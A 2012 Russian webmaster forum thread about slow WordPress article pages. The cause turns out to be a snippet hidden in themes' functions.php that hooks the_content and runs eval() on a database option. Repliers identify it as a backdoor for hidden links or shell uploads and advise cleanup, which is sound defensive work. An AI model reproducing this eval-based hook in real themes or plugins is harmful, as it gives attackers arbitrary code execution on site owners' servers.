Добрый день юзеры webmasters.ru.
Сегодня ко мне обратилось за подсказкой 3 человека, у всех были проблемы с сайтом, и был одинаковый симптом:
Сайт работает замечательно, а вот страницы со статьями грузятся ой как долго.
Попросив у них всех доступ к ftp я обнаружил, что все проблемы исчезают после удаление строки:PHP код:Но, как же быть, это ведь функция вывода все статьи.
<?php the_content(); ?>
Решение к моему, и не только моему счастью, было найдено довольно быстро, у всех 3 пациентов в шаблонах находился код, который как раз и "затуплял" сайт.
Этот код выглядел так:PHP код:После удаление оного, сайт стал работать как и подобает хорошему блогу.
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
p.s.
Так как в web я перешел недавно (до этого я шлялся по wap'у), то изучить структуру wordpress'a я не успел, поэтому я не знаю за что отвечает этот код, но после его удаления ничего не обрезалось, не удалилось и не взорвалось, поэтому если у вас тоже возникла(возникнет) такая проблема - то решения я уже описал.
Проделки WordPress или очень интересное наблюдение.
(Ответов: 20, Просмотров: 2161)
- 15.04.2012 23:17
- 15.04.2012 23:20
AntoXa, спасибо! Я как раз был первым из его пациентов=)
- 15.04.2012 23:25
этот говнокод для проставления скрытых ссылок в темах.
- 15.04.2012 23:30
- 15.04.2012 23:37
- Регистрация: 19.12.2009
- Сообщений: 145
- Репутация: 32
да, похоже в тема с "сюрпризом"
который позволяет вставлять разный код в статьюСпасибо сказали:
AntoXa(16.04.2012), - 15.04.2012 23:39
KipiaSoft, если логически рассуждать, то это в functions.php ну, по крайней мере у меня хоть такого и нет, но во всех шаблонах если есть add_filter то только в этом файле
- 15.04.2012 23:42
Чеснок абсолютно прав, данный код находился именно в файле functions.php
---------- Сообщение добавлено 22:42 ---------- Предыдущее 22:41 ----------
ctapbiu, простите, но я не понял о чем вы.Спасибо сказали:
KipiaSoft(16.04.2012), - 15.04.2012 23:58
- Регистрация: 19.12.2009
- Сообщений: 145
- Репутация: 32
я про то, что делает данный код
он берет из БД переменную blogoption, которая не сильно настораживает, и выполняет её
и причем там может быть всё что угодно - все зависит от извращенности фантазии создателя данного кода
в данном случае, скорее всего, скрипт стучится на известный ему ресурс и получает "дальнейшие инструкции"
хорошо, если просто вставлять ссылки, но с тем же успехом может и шелл заливать...
ЗЫ: у кого обнаружилась такая радость в теме - проверьтесь на наличие подозрительных файлов/директорий
ЗЗЫ: если темы из одного источника - было бы неплохо проинформировать народ, чтобы провериться на эту бяку
ЗЗЗЫ: а минус-то за что? о_О - 16.04.2012 00:01
Чеснок, Спасибо!
Сегодня праздник, слогикой как то не лады - 16.04.2012 00:05
ctapbiu,тоже есть мнение, что название blogoption - это просто прикрытие для скрипта.
Ведь, если присмотреться, то можно увидеть eval(), а он выполняет любой код из переменной, возможно даже и шелл.
Завтра днем попробую посмотреть куда ведут все дороги.
Тэги топика:
Похожие темы
Темы | Раздел | Ответов | Последний пост |
---|---|---|---|
Еще одно интересное предложение : IPAD2 за 14 Т.р | Оффтоп и свободные темы | 18 | 07.11.2011 21:08 |
Рассылка "Все интересное из мира seo за неделю" | Обсуждение форума и ваши предложения | 2 | 21.06.2011 03:17 |
Конкурс «Самое интересное интервью»! | Дайджест блогосферы | 2 | 20.05.2011 16:26 |
Интересное почитать от SeoProfy | Дайджест блогосферы | 8 | 23.01.2010 04:22 |